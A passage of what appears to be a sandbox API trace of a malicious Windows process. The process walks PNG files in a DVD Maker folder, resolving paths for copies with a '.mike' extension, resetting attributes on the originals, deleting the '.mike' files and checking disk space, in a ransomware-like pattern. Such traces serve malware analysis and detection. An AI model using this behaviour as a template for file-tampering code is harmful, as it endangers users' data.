lpOldMode=0x2af02c) returned 1 [0054.734] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", lpFilePart=0x0) returned 0x50 [0054.734] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", lpFilePart=0x0) returned 0x50 [0054.734] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png", dwFileAttributes=0x80) returned 0 [0054.735] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", lpFilePart=0x0) returned 0x50 [0054.735] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", lpFilePart=0x0) returned 0x50 [0054.735] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png.mike")) returned 1 [0054.738] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.738] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", lpFilePart=0x0) returned 0x50 [0054.738] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png", lpFilePart=0x0) returned 0x4b [0054.742] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", lpFilePart=0x0) returned 0x50 [0054.742] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", lpFilePart=0x0) returned 0x50 [0054.742] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png", dwFileAttributes=0x80) returned 0 [0054.744] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", lpFilePart=0x0) returned 0x50 [0054.744] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike", lpFilePart=0x0) returned 0x50 [0054.744] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png.mike")) returned 1 [0054.746] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.746] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", lpFilePart=0x0) returned 0x46 [0054.746] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png", lpFilePart=0x0) returned 0x41 [0054.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", lpFilePart=0x0) returned 0x46 [0054.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", lpFilePart=0x0) returned 0x46 [0054.768] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png", dwFileAttributes=0x80) returned 0 [0054.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", lpFilePart=0x0) returned 0x46 [0054.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike", lpFilePart=0x0) returned 0x46 [0054.771] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png.mike")) returned 1 [0054.774] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", lpFilePart=0x0) returned 0x38 [0054.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png", lpFilePart=0x0) returned 0x33 [0054.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", lpFilePart=0x0) returned 0x38 [0054.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", lpFilePart=0x0) returned 0x38 [0054.780] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png", dwFileAttributes=0x80) returned 0 [0054.781] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", lpFilePart=0x0) returned 0x38 [0054.781] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike", lpFilePart=0x0) returned 0x38 [0054.781] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png.mike")) returned 1 [0054.784] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.784] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x48 [0054.785] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png", lpFilePart=0x0) returned 0x43 [0054.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x48 [0054.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x48 [0054.791] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0054.792] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x48 [0054.792] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x48 [0054.792] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png.mike")) returned 1 [0054.794] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.794] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x4e [0054.794] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png", lpFilePart=0x0) returned 0x49 [0054.798] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x4e [0054.798] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x4e [0054.798] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0054.799] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x4e [0054.799] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x4e [0054.799] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png.mike")) returned 1 [0054.810] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.811] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", lpFilePart=0x0) returned 0x45 [0054.811] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png", lpFilePart=0x0) returned 0x40 [0054.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", lpFilePart=0x0) returned 0x45 [0054.816] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", lpFilePart=0x0) returned 0x45 [0054.816] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png", dwFileAttributes=0x80) returned 0 [0054.817] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", lpFilePart=0x0) returned 0x45 [0054.817] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike", lpFilePart=0x0) returned 0x45 [0054.817] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png.mike")) returned 1 [0054.819] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.820] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", lpFilePart=0x0) returned 0x51 [0054.820] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png", lpFilePart=0x0) returned 0x4c [0054.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", lpFilePart=0x0) returned 0x51 [0054.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", lpFilePart=0x0) returned 0x51 [0054.824] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png", dwFileAttributes=0x80) returned 0 [0054.825] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", lpFilePart=0x0) returned 0x51 [0054.825] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike", lpFilePart=0x0) returned 0x51 [0054.825] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png.mike")) returned 1 [0054.828] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.828] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x51 [0054.828] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png", lpFilePart=0x0) returned 0x4c [0054.832] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x51 [0054.832] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x51 [0054.832] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0054.833] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x51 [0054.833] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x51 [0054.833] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png.mike")) returned 1 [0054.836] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.836] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x57 [0054.836] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png", lpFilePart=0x0) returned 0x52 [0054.840] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x57 [0054.840] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x57 [0054.841] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0054.841] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x57 [0054.842] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x57 [0054.842] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0054.844] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.844] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.845] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD 